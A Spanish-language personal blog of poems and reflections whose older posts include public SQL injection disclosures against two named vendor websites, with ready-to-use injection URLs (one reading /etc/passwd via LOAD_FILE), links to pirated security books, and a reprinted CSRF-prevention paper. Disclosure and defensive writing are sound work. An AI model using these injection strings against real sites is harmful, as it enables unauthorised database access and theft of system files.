MAYA SOUND

lunes, 30 de agosto de 2010

Flor de Luna - MoonFlower

En tus pétalos frondosos resguardas toda una pasión
de los dias calurosos solo esperas al caer la noche, la luna
luna que envuelve con el reflejo tibio del sol tu belleza
y aunque la noche sea triste y fría no importa la soledad
pues estás y con ello significa mucho massss...

Tallos verdes y gruesos, ni un solo marchitar, ni un solo maltrato
belleza pura en un  desconocido ambiente hostil y cambiante 
como sobrevives?, como  mantienes?, como me calmas?
importa?, quizas.... ,  lo que se es que me sorprendes cada vez  mas

Exótica dirían algunos, tan perfecta dirian sin cuestionar 
que te encuentres tan serena y oculta es como tu sabes vivir
mas no cautiva, pues libre eres sin pensarlo y sin evitarlo
para ojos sorprender, para cuidado obtener, para suspiros recibir

Hermosa flor de luna, no hay otra como tu.


by rol0
 

lunes, 23 de agosto de 2010

Porque Nunca Paso.... (afirmación)






Cause never Happen... just in our minds...

sábado, 29 de mayo de 2010

# - Aun esperando por el verano en ti- #

Consumar una pasión que nace en un deseo
y no ver en tu mirada una tristeza momentanea
existe el espacio lleno de almas que en ningún momento me interezó
solo espero una acción para colmarte de tanto amor

la lluvia es tan pesada y fría, que en tu mirada no deseo exista
en tus labios existe un sol tan cálido que deseo con ansias ver
en tus ojos como lunas llenas hoy reflejan mi camino hacia ti

aunque sienta el frió a causa de un temporal extraño
en mi interior existe un dispuesto corazón a entregar
cuanto quisiera te des cuenta de que hace tiempo empezó esto
pues solo tu corazón quisiera demostrarte puedo enmendar

Aun no medio palabra...
Aun te espero,
vales mucho y si!, claro!,
tu puedes amar y solo déjate mostrar!

jueves, 27 de mayo de 2010

@"- Vuelo Subestimado - Parte I -"@

Y cuando todo parecia estar bien, algo invadio su corazón/
plumas rojas, verdes y su sencillez lo acompañan siempre al cantar/
nada es suficiente y el todo hace falta, luego comentó/
que los demas nada sepan y con un murmullo confuso dejó luego pasar

Despues de un ligero pensamiento, su deseo lo conmueve y en su pensar sembro la esperanza/
nadie lo sigue de momento pues su viaje es unico, a donde su destino nadie conoce/
que habrá pensado?.. dominar una vez mas la duda si podra llegar sin caer? /
y en el sueño eterno sus viajes anteriores en memorias dejar de percibir?/

su duda dominó como la verdad que hay en conocer cada esquina de cada montaña/
sin embargo sus alas rusticas que el pasar del tiempo le prometio para hoy/
que todo sea igual al primer momento en que descubrio aquel... su mejor lugar/
no preparó cual espera y en el primer aliento que tomo a su horizonte hecho a volar/


oh vuelo con ruta fija, ohhh... vientos que arrebatan del camino al vacio/
no ves hacia los lados, no escuchas comentarios, pues conoces tu destino, mas llegarás?/
ves aves competentes de rapiña, para ti no es un obstaculo, pues tu meta es objetivo/
ahora, ciego por la esperanza, no ves el llanto de las nubes que insinuan no insistir mas/

un sol brillante?, un refugio?, calor de hogar, comida abundante... el verano en mente/
tu experiencia te dice aguanta solo una vez mas, ya estas cerca y las nubes acabarán/
distancia larga o corta, acaso importa? solo un aleteo fuerte y la esperanza aumenta/
ave de escasas plumas pues su tiempo no promete que se cumpla lo que espera acabar /

un deseo, un anhelo, un esfuerzo en respirar una vez en vez.../
pequeña ave , solo esperas una oportunidad mas, pues su destino lo es todo...

by rol0 M. Noj

martes, 25 de mayo de 2010

&&(- Marooned, en soledad -)&&

Como puerta que conduce al olvido, abandonado sin esperanza
detalles curiosos como destello en su vida y el suceso inminente se acerca
que pides?, que sugieres? sin mediar palabra sabes el vacío te espera
el vacio solo abre a las puertas del olvido cercano.

Gotas de agua y segundos... ¿que sostienes de ellos con afán?
mientras aguardas en un lugar donde sopla fuerte el viento, y lo sabes
rinde el mar tantas gotas... y en cada gota un alma
solo entonces sabes que no estas sol@ y que nunca lo estarás


------------------------------------------------------------------------------------------
aahhhhhhhhh... que buenos tiempos, pink floyd y marooned



lunes, 17 de mayo de 2010

&-"Preludio Incierto"-&


Como una simple gota , sin ser predecido el lugar... al vació
Como una nube en el lugar menos habitual.... el desierto
Como un latido que da vida y energía al cuerpo... quizás el último
Como una fuerte sed en un espacio lleno de agua... el mar

Así es la esperanza cuando no hay solución... al menos, parece
Así es el horizonte cuando el preludio de lo inevitable se acerca... la no vida
Así es el tiempo que no perdona quien se interponga ... y nada que diga valdrá
Así es el valor de un desesperado intento por respirar... quizás el último.

Porque no existe un mañana sin el prejuicio del "que será?" .... si será esto... o lo otro
Porque no se justifica el presente si no hay conocimiento del pasado... o mejor no saber
Porque no hay extrañezas en coincidencias y solo medios que nos traigan hasta aca... hoy
Porque es esto el propósito de lo imprevisto y quizás lo injusto... lo mas seguro.

Esperanza, Vida y Tiempo... eso, solo eso espero
y otra respuesta que tu sabes, pues es un acierto.

by rol0 mux.

II Tour - krlit0x tours


pequeña despedia del viaje a Ixkun.

saludos!

lunes, 10 de mayo de 2010

Amor Como el Tuyo....Madre

Sin casualidades, llegaste un dia
con todo el afecto tu permitiste concebir
me diste el cariño que aun hoy siento en la vida
y ya nadie podrá cambiar lo que pueda sobre ti decir.

Que el amor como el tuyo es invaluable por ser demasiado
que cuando mas pequeño, a dar mis primeros pasos cuidabas
que cuando no tan grande tus lagrimas no se si merecia
y en ellas se veían el contenido de tu amor me dabas

Que no lo recuerdo?... no puedo yo decir
si en el presente se marca en tu rostro lleno de ternura
que muestra el sentido de aprecio que puedo sentir
y las caricias del pasado no lejano en mi memoria son dulzura

No puedo ni debo olvidar quien tu eres en verdad
si de todo lo que me das no hay una medida exacta
que parezca suficiente pues no lo es todo a cabalidad
cuando se trata de amor, eres el ser que no cuenta ni retracta

Como la primera vez mamá que me abrazaste
yo solo se que en esta ocasion no te podras negar
pues ahora soy yo quien debo apreciarte y de tanto.... colmarte
porque lo que has hecho es amarme y amor con amor debo yo pagar

by rol0 mux.
-------------------------------------------------------------------------

Para amar de a quien nos concibió y amo... mamá, madre naturaleza, madre tierra.... hay tiempo para dar lo que nos corresponde pues lo que nos ha dado es tanto para lo que muchas veces ella merece.

Saludos en su dia, madre preciosa, cariñosa, sin medida y espera de algo a cambio que podemos dar.

El camino que ella eligieron el de concebir es una gran tarea que aun solo puedo observar y darme cuenta que en sus dificultades y tropiezos, a ellas Dios le da gran fortaleza para salir adelante y darnos lo mejor aunque signifique privarnos de algo para darnos cuenta que es lo correcto, y aunque ella no te dio lo mejor de lo mejor, no se les puede querer menos pues no fue su posibilidad y eso solo es una pequeñez que no es de tomar en cuenta si se trata de corresponder.

He fallado en algunas ocasiones como hijo, porque como humanos es algo obvio que lo haga, solo que sea lo menos frecuente posible es lo mejor para estar mejor.

Un saludo a ese precioso ser!!!!... Madre.

by rol0 mux.



lunes, 3 de mayo de 2010

Solo un silencio antes de escribir....

Que es el silencio?... para muchos como un significado como el siguiente:

- Lo mejor que puede pasar después de fiesta y el mejor remedio para un dolor de cabeza.

- Como en una tarde lluviosa, cuando la grama toma un tono mas verde que nace del corazón de
la tierra mojada, que a su vez, suelta un olor muy singular, sobre todo si el verano ha tomado su ultimo vuelo en una mañana calurosa y soleada y que también muchos toman una siesta al sentir la pesadez del la misma.

- Cuando la necesidad de una reflexión toma por iniciativa la primera orden de la calma y llegar a una decisión importante que de lo contrario todo podría acabar mal.

Asi es el silencio, como cuando un particular ejemplo.....................

Silencio no necesariamente es soledad, y sin embargo la soledad es un punto de prejuicio a tomar en cuenta.
El silencio como vacio, puede serlo como existencial, pero incluso temporal pues no podria ser eterno.

Silencio que lleva a la meditación, y la meditación con el proposito de definir la existencia propia del actor, que muy posiblemente para beneficio personal.

Cuando existe el silencio, aunque sea uno temporal, conlleva la calma. Una calma que puede dar un punto de vista diferente y apreciación a lo que está en nuestro entorno o a la imaginación total.

Como cuando una calle con vias alternas, todas en su horizonte indefinido aun, no se encuentra ningún detalle que haga la diferencia entre una y las demás, es un decisión la via a tomar el camino que nos definirá, parte del silencio la mejor decisión.

Silencio que estuvo antes de nuestra existencialidad, mientras respiremos sera temporal, y cuando dejemos esta vida, continuará, pero solo en esta.

by rol0 mux.

jueves, 22 de abril de 2010

" Otoño Medieval"

La ultima hoja, el mismo rio, no queda mucho que ver
sin embargo es acongojante y no darse cuenta
que todo tiene un principio y este solo es un paso
y el aprecio de lo que poco a poco se acaba.

La ultima hoja, el mismo rio, no queda casi nada.
el tiempo pasa y este cambio es vital para un nuevo comienzo
todo comienzo tiene un proposito y el proposito muchas veces no se conoce
pero el proposito no siempre es el mas conveniente y esto es importante.

La ultima hoja, el mismo rio, las ultima gotas y lleva la misma direccion
el punto clave no lo reconoceré, no en esta ocasión y posiblemente en ninguna otra
no se acaba aqui porque esto es pasajero, es ocasional pero la importancia de ameritar
y aunque parezca que estas letras no tienen relación, todo parece ser claro al menos para mi.

La ultima hoja ya cayo........ las ultima gotas las llevará en la misma dirección
para dejar ese vacío que esta pronto a cambiar... y es el ciclo
el ciclo interminable y su proposito es el mismo, dar el sentimiento de una oportunidad distinta
aunque la proxima hoja que caiga y las ultimas gotas que la lleven nunca sean las mismas.

by rol0 mux



En recuerdo de una de mis bandas favoritas, Ratablanca


jueves, 1 de abril de 2010

El principio

Al principio estaba el vacio, aparentemente era solo eso, pero el vacio no era la nada (la omnipresencia de el era notable desde siempre....), ...........(un tiempo despues) y surgio lluvia de particulas, formando su magestuosa luz, tanto que ha llegado a formar lo que hoy entendemos por "el todo".

Primero fueron las leyes, hechas por el, luego el suceso, todo en su orden y su momento, la relacion que une al espacio y el tiempo (A. Einstein) para darle sentido a lo que hoy existe, porque lo que existe (lo entendemos asi por que nuestros sentidos le dan la forma a algo), es asi por al menos una razon, y es por la que el ha decidido que tenga su presencia, temporal corta como la vida de una abeja o temporal larga como la vida de un planeta, incluso nuestro sol que mantiene a los planetas unidos tambien acabara un dia lo dicen... , y esa razon le puede dar un sentido muy especial a mi vida, pero aveces una distraccion que no acepta interrupcion, no encuentra ese minimo de luz que haga notar hacia mi, el aprecio que se le debe por tan magnifica creacion, y solo unas cuantas palabras por tan cortas que parezcan tendrian un significado muy especial para el, de eso estoy seguro.

Gracias nuestro creador, Dios!.

Un poco de relatividad (A.Einstein ), big bang, el libro el genesis (la biblia) y mi pensar.

by rol0 mux.

lunes, 10 de marzo de 2008

Biostar On the Mirror

Fallo de gravedad en el sitio de la reconocida marca de Biostar, http://www.biostar.com.tw/ igualmente reportado como rootharm en el foro "Crackergt" y "Security Shell"

http://www.biostar.com.tw/app/en-us/vga/content.php?S_ID=4%20UNION%20ALL%20SELECT%201,2,3,4,DATABASE(),6,7--


Un Saludo chapin.

drivers-download.com en la mira..

El 7 de enero del presente mes, registrado como rootharm en el foro "Crackergt" y "Security Shell", publique el bug SQL inyección, ya que el webmaster, administrador no me respondio a los repetidos mensajes enviados a su correo.


http://www.drivers-download.com/en/list.php?id=-1/**/UNION%20ALL%20SELECT/**/1,2,LOAD_FILE(CHAR(47,%20101,%20116,%2099,%2047,%20112,%2097,%20115,%20115,%20119,%20100)),+4,+5,+6,+7,+8,+9,+10/*

mucho cuidado.

domingo, 11 de noviembre de 2007

The Shellcoders Handbook



This book is dedicated to anyone and everyone who understands that hacking and learning is a way to live your life, not a day job or semi-ordered list of instructions found in a thick book.

size:
9159 KB
download:
http://rapidshare.com/files/68987401/The_Shellcoders_Handbook.pdf

greetings

miércoles, 7 de noviembre de 2007

Format String Paper

A good paper about format string issues.

size: 31kb

download
http://rapidshare.com/files/68087167/envpaper2.pdf

lunes, 5 de noviembre de 2007

Preventing CSRF

[code]Author: Nexus

-[ SUMMARY ]---------------------------------------------------------------------
0x01: Hello World
0x02: Introduction
0x03: About Authentications
\_ 0x03a: Cookies Hashing
\_ 0x03b: HTTP Referer
\_ 0x03c: CAPTCHA Image
0x04: One-Time Tokens
0x05: Conclusions
---------------------------------------------------------------------------------



---[ 0x01: Hello World ]
Welcome to a fresh new inaugural paper for the new season of the Playhack.net
Project! :) I'm really happy to see you back again and make our c00l project
be back!

Hope you'll enjoy this new short paper and i invite you to visit the whole new
project at:
http://www.playhack.net

Intake: actually nothing.. just a pair of cigarettes! :\

Shoutouts: all my shoutouts goes to my playhack m8s null, omni, god and emdel,
ofc to str0ke! NEX IS BACK!
-----------------------------------------------------------------------------[/]



---[ 0x02: Introduction ]
I already dealt with the Cross Site Request Forgery topic, but not too deep
regarding the possible solutions that web developers should adopt.
In these days i've been deeply involved in this topic during the coding of a
distributed web application which should warrant a good level of security for
user and most of all for the system's administrators (who are not that smart
though their tasks :P).
Considering this situation i had to consider each aspect and each possible
attack attempts that the applications could eventually suffer.

The one that gave me most problems to apply has been the Session Riding
(or CSRF, call it as you prefere) because there is no 100% certain way to
prevent that due to the concept that the attack fully stands on the users'
credentials.

If you don't really know what Session Riding is you should read the previous
paper reachable at the following link:
http://www.playhack.net/view.php?id=30
-----------------------------------------------------------------------------[/]



---[ 0X03: Possible Solutions ]
Ok, from here i must assume that you quite deeply know how a Session Riding
attack should work out :P
Let's just have a little and fresh resume..

Consider that a trusted user is logged into a website which permits him to
accomplish some important or confidential actions, an attacker wants to get
over a possible login attack (which often will be voided) and disfrut the
opened session of the user in order to realize some crafted actions.

The attacker in order to hijack the user's session will craft an appropriate
web page which will hide a javascript function that re-create an original
form but with fixed values, then he'll make the victim visit that page which
on load will submit the form to the remote action page which will accomplish
the request secretely (without the victim's aknowledge) confying on the user's
trusted credentials.

This is a as quick as simple explaining of how a Session Riding attack would
work out, the important question now is
"How do i prevent my users to be victims of that?".

Now you would probably consider the following solutions:
- Check some cookies credentials
- Check the HTTP Referer
- Use a CAPTCHA

With some tryouts you'll realize that these are not the most proper solutions
to adopt, let's see why one by one.
-----------------------------------------------------------------------------[/]


------[ 0x03a: Cookies Hashing ]
This first one could be a very simple and quick solutions to this problem
because the attacker should not be aware of the victim's cookies contents,
and cannot craft then a proper workaround.

An implementation of this solutions would work out in a way like following.
In some login file we create the Cookie related to the current session:




We use an hashing of the Cookie to make the form verified





">




And the action script would be something like following:




Actually this would be a fine solution to CSRF if we wouldn't consider the
fact that the user's cookie are a way easy to retrieve disfruting some XSS
flaw in the website (that we previousy saw they are not a rarity :D).
It would be more secure if we create and destroy a random cookie for each
form request that the user makes, but it wouldn't be very comfortable.
-----------------------------------------------------------------------------[/]



------[ 0x03b: HTTP Referer ]
The easiest way to check if the incoming requests are trusted and allowed, is to
disfrut the HTTP Referer and check if they come from the same website or from
a remote malicious page: this would be a great solution, but it falls due to
the possibility to spoof the referers and make them appear to be corrects.

Let's see why it's not a proper solution..
The following code shows an implementing example of HTTP Referer:

if(eregi("www.playhack.net", $_SERVER['HTTP_REFERER'])) {
do_something();
} else {
echo "Malicious Request!";
}


This check can be easily bypassed forging a fake HTTP Referer from the attacker's
script using something like:
header("Referer: www.playhack.net");
Or any other way to forge the Headers to be sent from the malicious script.

Since the HTTP Referer is sent by the browser and not controlled by the server
you should never consider this variable as a trusted source!
-----------------------------------------------------------------------------[/]



------[ 0x03c: CAPTCHA Image ]
Another idea that came out in order to solve this issue is to use a random CAPTCHA
image in every form which require the user to type in a textbox the generated string
and with that verify the integrity of the submitted datas and the credentials of
the user.

This solutions has been discarded some time ago due to the possibility to retrieve
the captcha image using the so called MHTML bug, which affected several versions of
Microsoft Internet Explorer.

You can find all the specific informations about this vulnerability from the Secunia
website:
http://secunia.com/advisories/19738/

Here's an extract from the Secunia's explanation of the bug:
"The vulnerability is caused due to an error in the handling of redirections for URLs
with the 'mhtml:' URI handler. This can be exploited to access documents served from
another web site."

In the same page you can find also a web test made from Secunia Staff.

Actually this bug is known to be solved with several patches released by Microsoft
for Windows XP and Windows Vista and with the release 6.0 of their own browser
Internet Explorer.

Even if actually it appears to be secure, the times brought to others possible
and theoretically more reliable solutions.
-----------------------------------------------------------------------------[/]



---[ 0x04: One-Time Tokens ]
Now let's explain the final solution i decided to adopt for my job: after having
dealt with all of these unreliable techniques i tried to write something different
and probably more effective.

In order to make the webforms safe from Session Riding (CSRF) i decided to make the
checking free from any kind of item that could be spoofed, retrieved or faked.
So i needed to create some one-time tokens that cannot be guessed or retrived in
any way and that after having accomplished their task would have been destroyed.

Let's start from the token value generation:




The uniqid() PHP function allows the web developer to get a unique ID from the
current time in microseconds, which is quite good in order to retrieve a value
that won't be repeated again.

We retrieve the MD5 hashing of that ID, and then we select 8 characters from that
hashing starting from a random number <=24 (strlen($hash)-8). The returned $token variable will retrieve an 8-long randomized token. Let's now generate a Session Token which will be used later for the last check:



With this function we call the gen_token() function and use the returned token
to copy his value into a new $_SESSION variable.

Now let's see the function that will start the whole mechanism and that generates
the hidden input for our form:

\n";
}
?>


As we can see this function just call the gen_stoken() function and create the
HTML code for the hidden input that will be included in the web form.

Let's now take a look to the function that make the check of the Session Token
with the submitted hidden input:




This function check the existance of the $_SESSION[STOKEN_NAME] and of
$_REQUEST[FTOKEN_NAME] (i used the $_REQUEST method in order to accept both GET
and POST methods from the form) and check if their values are the same: if they
are the submitted form is authorized.

The important point of this function is that at every concluding step the tokens
get destroyed and will be recreated only at next webform page call.

The use of these functions is really simple we just need to just add some additional
PHP nstructions.

This is the webform:











And this is the resolving script:





As you can see is really simple to implement such a check and it should protect
your users from being hijacked by attackers and avoid to get your datas
compromised.
-----------------------------------------------------------------------------[/]



---[ 0x05: Conclusions ]
Let's conclude this short paper saying that there is no 100% way to be secure
that your web application is completely safe, but you can start avoiding the
most common attacking techniques.

Another point that i'd like to make you focus on is that a web developer SHOULD
NOT forget of general applications faults (like XSS Browser Bugs ecc..), it
would be a great mistake not considering them as a potential threat for your
users: you should always keep in mind everything that could compromise your
application's integrity, security and interoperability.

Cya!

nexus

(The above PHP codes were taken from the Seride project, hosted at
http://projects.playhack.net/project.php?id=3)
-----------------------------------------------------------------------------[/]


\======================================[EOF]=====================================/

[/code]

domingo, 4 de noviembre de 2007

VBScript Programmers Reference


VBScript is one of Microsoft's scripting languages, which can be employed in a variety of ways — from client-side scripting in Internet Explorer to server-side programming in ASP and the new Microsoft Windows Script Host.

size:
2939KB

download link
http://rapidshare.com/files/67401104/vbscript.rar

sábado, 3 de noviembre de 2007

...:::en la universidad:::...

Buen dia.

Hoy me encuentro recibiendo una clase de lenguajes formales y automatas en la cual estoy viendo el pizarron que desplega la imagen de la cañonera algunas explicaciones sobre nuestro proyecto final "Una calculadora científica" xD... ya solamente quedan pocos dias para entregarla y asi que ha hecharle muchas ganas...

un saludo

miércoles, 31 de octubre de 2007

¿Sabotaje electoral para la segunda vuelta?

Hoy al llegar al medio dia a mi casa dispuesto a comer, antes de hacerlo me fui a ver la tele, sintonizo uno de los noticieros del medio día y me encuentro con esta sorpresa, ¿Un sistema de película? asi fue como lo calificaron al estar completamente seguros los del Tribunal Supremo Electoral por estar seguros que su sistema de base de datos es aprueba de intruciones hacker y que se autodestruirá si este trata de ingresar a la base de datos y hacer de las suyas.

Juzguen uds mismos, aca les dejo la grabacion en audio subida

http://rapidshare.com/files/66557997/sistema_Elecciones.WAV

como sujerencia suban al volumen para escuchar mejor el audio...

un saludo